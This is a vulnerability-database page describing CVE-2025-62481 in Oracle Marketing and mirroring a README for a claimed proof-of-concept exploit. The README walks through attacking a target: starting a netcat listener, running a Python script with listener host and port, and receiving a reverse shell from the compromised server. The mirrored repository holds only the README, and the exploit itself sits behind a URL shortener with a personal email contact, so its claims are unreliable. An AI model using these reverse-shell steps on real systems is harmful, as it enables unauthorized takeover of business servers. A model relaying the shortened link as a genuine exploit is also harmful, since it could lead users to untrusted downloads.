关联漏洞
标题:
Oracle E-Business Suite 安全漏洞
(CVE-2025-62481)
描述:Oracle E-Business Suite是美国甲骨文(Oracle)公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。 Oracle E-Business Suite的Oracle Marketing 12.2.3版本至12.2.14版本存在安全漏洞,该漏洞源于未经验证的攻击者可通过HTTP网络访问进行攻击,可能导致Oracle Marketing被接管。
介绍
# Oracle Marketing Exploit - CVE-2025-62481
## Overview
This repository contains a proof-of-concept exploit for CVE-2025-62481, a critical vulnerability in Oracle Marketing versions 12.2.3 through 12.2.14. The exploit allows unauthenticated remote attackers to achieve full compromise of the affected system via HTTP, impacting confidentiality, integrity, and availability.
## Requirements
- Python 3.8+
- Libraries: requests, urllib3
- Target: Oracle E-Business Suite with Oracle Marketing 12.2.3-12.2.14 exposed via HTTP/HTTPS
- Network access to the target's port (default 80/443)
## Usage
1. **Install dependencies**
```
pip install -r requirements.txt
```
2. **Set Up the Listener with Netcat**
- Install netcat if not already present:
```
sudo apt install netcat # On Debian/Ubuntu
sudo yum install nc # On CentOS/RHEL
```
- Start the listener on your chosen IP and port. For example, if you specified `--lhost 192.168.1.100` and `--lport 4444` in the exploit:
```
nc -lvnp 4444
```
- The listener will wait for the incoming connection from the target.
3. **Run the Exploit**
Execute the exploit script with the appropriate arguments, ensuring `--lhost` and `--lport` match the listener’s IP and port:
```
python cve-2025-62481.py --target http://example.com:8080/marketing/admin --lhost 192.168.1.100 --lport 4444
```
The exploit sends a payload to the target, instructing it to connect back to `192.168.1.100:4444`.
4. **Receive the Shell**
- Once the exploit succeeds, the target system executes the reverse shell payload, connecting to your listener.
- In the netcat terminal, you’ll see a connection established, and you’ll be presented with a shell prompt (e.g., `bash` or `sh`) from the target system.
## Disclaimer
This tool is for educational and testing purposes only. Use on authorized systems with explicit permission. The author is not responsible for any misuse or damage caused.
## Exploit
[href](https://tinyurl.com/ycye7j8s)
For any inquiries, please email me at: eviedejesu803@gmail.com
文件快照
[4.0K] /data/pocs/3aac6e1e479efe2b86179983d5ebc8d4980ae059
└── [2.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。